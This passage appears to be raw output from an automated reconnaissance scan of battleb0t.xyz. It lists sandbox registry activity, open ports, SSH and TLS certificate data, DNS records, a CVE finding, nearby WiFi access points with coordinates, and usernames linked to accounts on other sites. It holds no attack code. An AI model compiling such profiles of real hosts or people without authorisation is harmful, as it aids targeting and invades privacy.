"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{B801CA65-A1FC-11D0-85AD-444553540000}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "rundll32.exe" touched "Computer" (Path: "HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n "rundll32.exe" touched "Enhanced Storage Icon Overlay Handler Class" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\\TREATAS")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 1 (GFS Unread Stub)" (Path: "HKCU\\CLSID\\{99FD978C-D287-4F50-827F-B2C658EDA8E7}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 2 (GFS Stub)" (Path: "HKCU\\CLSID\\{AB5C5600-7E6E-4B06-9197-9ECEF74D31CC}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)" (Path: "HKCU\\CLSID\\{920E6DB1-9907-4370-B3A0-BAFC03D81399}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 3 (GFS Folder)" (Path: "HKCU\\CLSID\\{16F3DD56-1AF5-4347-846D-7C10C4192619}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 4 (GFS Unread Mark)" (Path: "HKCU\\CLSID\\{2916C86E-86A6-43FE-8112-43ABE6BF8DCC}\\INPROCSERVER32")\n "rundll32.exe" touched "Memory Mapped Cache Mgr" (Path: "HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\INPROCSERVER32")\n "rundll32.exe" touched "Property System Both Class Factory" (Path: "HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS")\n "rundll32.exe" touched "Start Menu Cache" (Path: "HKCU\\CLSID\\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\\TREATAS")\n "rundll32.exe" touched "Start Menu Pin" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}\\PROGID")\n "rundll32.exe" touched "User Pinned" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1F3427C8-5C10-4210-AA03-2EE45287D668}\\INPROCSERVER32")\n "rundll32.exe" touched "Shell File System Folder" (Path: "HKCU\\CLSID\\{F3364BA0-65B9-11CE-A9BA-00AA004AE837}\\INPROCSERVER32")\n "rundll32.exe" touched "User Assist" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\\PROGID")\n "rundll32.exe" touched "Shared Task Scheduler" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{603D3801-BD81-11D0-A3A5-00C04FD706EC}\\TREATAS")\n "rundll32.exe" touched "Internet Shortcut" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "rundll32.exe" touched "Shortcut" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00021401-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "rundll32.exe" touched "Taskband Pin" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\\TREATAS")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC7AF.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC75F.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Registry Access', u'identifier': u'registry-25', u'name': u'Reads information about supported languages', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE"; Key: "EN-US")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE"; Key: "EN-US")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE"; Key: "00000409")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE"; Key: "ES")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE"; Key: "ES")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE"; Key: "ES-ES")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE"; Key: "PT")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE"; Key: "PT")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE"; Key: "PT-BR")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE"; Key: "PT-BR")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE"; Key: "UK")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE"; Key: "UK-UA")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE"; Key: "UK-UA")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE"; Key: "BE")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE"; Key: "BE")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE"; Key: "EU-ES")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE"; Key: "EU-ES")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDED | 185.199.110.153 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.93): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:25 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0000magda0000.github.io |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | www.github.com | www.battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTaFmrKmS (Net ID: 78:23:AE:39:B2:90) | 37.751, -97.822 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | PDI (Net ID: 00:06:25:FE:34:4D) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:23:09 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.0:8080 | 188.114.96.0/24 |
| 2023-05-12 03:43:57 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | https://kekw.battleb0t.xyz/jar | <!DOCTYPE html>
<html>
<iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</html> |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Room 208 (Net ID: 00:02:2D:66:D4:6B) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5ad40179b8e20f-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 02:44:05 | SSL Certificate Expiring | Yes | CertSpotter | 0 | 0 | 1 | 0 | None | 2023-05-14 15:23:50 | battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Capsmanagement (Net ID: 00:01:21:1C:AD:40) | 41.8781, -87.6298 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=ayshoo | ayshoo |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes256-gcm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.223): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:19 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2600:1f18:2489:8201::c8 | pics.battleb0t.xyz |
| 2023-05-12 03:14:48 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-6329
https://nvd.nist.gov/vuln/detail/CVE-2016-6329
Score: 5.9
Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. | www.ayhu.xyz |
| 2023-05-12 02:44:22 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | United States | 185.199.109.153 |
| 2023-05-12 02:45:34 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | route2.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan11 (Net ID: 00:02:6F:08:21:EE) | 37.7642, -122.3993 |
| 2023-05-12 03:21:44 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | PinkBike (Category: hobby)
https://www.pinkbike.com/u/dawid.sulej/ | dawid.sulej |
| 2023-05-12 02:51:43 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4e:82:1a:86:ae:7d:8a:39:3c:25:24:c6:46:df:b3:a2:f4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 03:43:01 2023 GMT
Not After : Jul 23 03:43:00 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:dc:59:e7:99:ae:31:e4:ce:62:3e:34:b7:81:78:
80:f6:cd:df:74:9e:4d:b0:70:b7:b4:57:2f:17:e3:
3f:ff:b7:70:ed:8a:df:e6:f8:7a:13:c3:bd:36:4f:
0e:6a:68:6d:9d:a6:4b:2a:e9:cf:28:3d:81:ea:ca:
83:e7:16:86:77:3d:14:db:66:a8:57:ad:1a:0f:dd:
bd:7a:de:42:3b:37:3e:1c:ee:7d:2e:c6:c7:59:4e:
97:c9:0c:71:fa:0f:cd:7b:53:70:a6:5f:75:ef:13:
69:99:fc:c4:53:c7:8e:d0:09:93:90:8c:53:db:39:
20:10:21:64:71:0b:d6:b1:4c:65:ce:12:f1:57:52:
01:6a:62:40:bf:50:e1:af:0a:5c:4b:64:2c:31:51:
3e:93:5a:d7:3f:02:ea:a6:3c:b6:44:a0:a2:88:9a:
29:5e:d3:7c:e0:73:af:03:2d:32:ad:0b:a7:f4:f0:
67:e5:fc:86:ba:7a:2e:9a:6b:e7:a5:c3:0e:1d:6b:
4d:99:e3:e1:77:10:a6:f7:fe:e7:5d:ea:9a:d7:11:
bf:a0:de:50:ee:ee:9e:57:01:39:6f:73:ca:e6:06:
09:03:5a:1d:77:7b:8a:3f:fa:c2:82:ef:9a:8b:50:
68:73:cc:01:67:44:99:3d:d1:99:16:93:ec:e9:25:
6b:ff
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:07:25:ED:0B:E1:FD:78:EA:13:86:BD:62:79:CF:21:9B:25:7F:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:B5:F3:29:BD:A0:20:09:5F:ED:BA:FE:
7D:4D:29:A6:16:28:D4:3D:6D:9D:84:56:4B:24:03:17:
F8:9F:1F:43:94:02:20:37:6C:63:6A:C8:C5:31:F7:F8:
33:84:21:F6:22:36:21:51:10:1E:BA:F6:84:58:81:0F:
85:70:0D:79:E6:82:79
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:3C:77:99:EE:DE:DA:A2:24:43:1C:AD:EC:
69:6F:50:53:78:A5:D6:06:2E:44:C5:18:AE:9E:8D:2C:
AE:F9:60:A7:02:20:7C:67:55:E9:15:15:6F:0B:C0:6C:
03:77:3B:85:8A:11:43:C9:26:F4:1A:B8:01:95:2B:3D:
D3:07:79:D2:22:0E
Signature Algorithm: sha256WithRSAEncryption
0c:76:65:e5:fc:42:37:1e:b5:d9:a4:86:ff:e5:cd:2e:ec:b9:
8b:1a:2f:85:2b:80:24:2f:8a:38:f7:2f:90:da:4b:59:72:ac:
50:00:d6:f8:be:ee:24:3b:97:1d:9e:48:b2:ab:16:91:7b:75:
8f:65:64:9a:36:23:e5:c7:78:a7:ca:89:1e:c3:f6:bc:f0:7a:
00:a4:96:0d:2f:d5:7c:15:b8:30:04:f0:6e:7a:7a:c2:72:48:
1b:96:01:fb:1c:d6:83:0a:db:4d:dd:29:ab:01:f5:bb:4a:29:
4c:39:51:33:13:62:6b:bf:71:ac:1a:0c:bd:96:7a:89:44:b0:
a2:59:75:22:e1:9f:be:29:7e:a6:58:6f:00:c7:ed:a0:96:03:
62:21:81:04:3c:b2:c5:64:f6:c6:bf:6d:dc:6c:2b:eb:42:0d:
12:26:44:7a:6c:18:03:83:8a:20:96:54:35:04:94:b3:1c:97:
ef:43:37:f9:66:94:3d:0c:c6:25:ff:59:cf:19:e0:84:45:73:
0c:a3:7b:29:a2:ae:7b:74:86:0e:3b:cb:c9:a4:5d:a4:7c:ff:
46:b0:a1:64:c6:83:24:a3:95:75:fa:60:2b:1c:df:c0:09:f6:
0a:8b:24:73:9a:7e:de:fe:0d:e4:ae:f5:fc:b8:f6:0c:9f:a5:
7e:82:4c:c8
| battleb0t.xyz |
| 2023-05-12 02:44:15 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz:443 | funny.battleb0t.xyz |
| 2023-05-12 03:09:12 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 207.154.228.160 | 207.154.228.169 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Canyon Crossing WiFi-scanning (Net ID: 00:18:0A:51:68:AC) | 37.751, -97.822 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:993 | 87.248.157.102 |
| 2023-05-12 03:03:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 001wwang.github.io |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | QUEER (Category: social)
https://queer.pl/user/login | login |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-6922 (Net ID: 00:1D:D4:19:69:20) | 32.8608, -79.9746 |
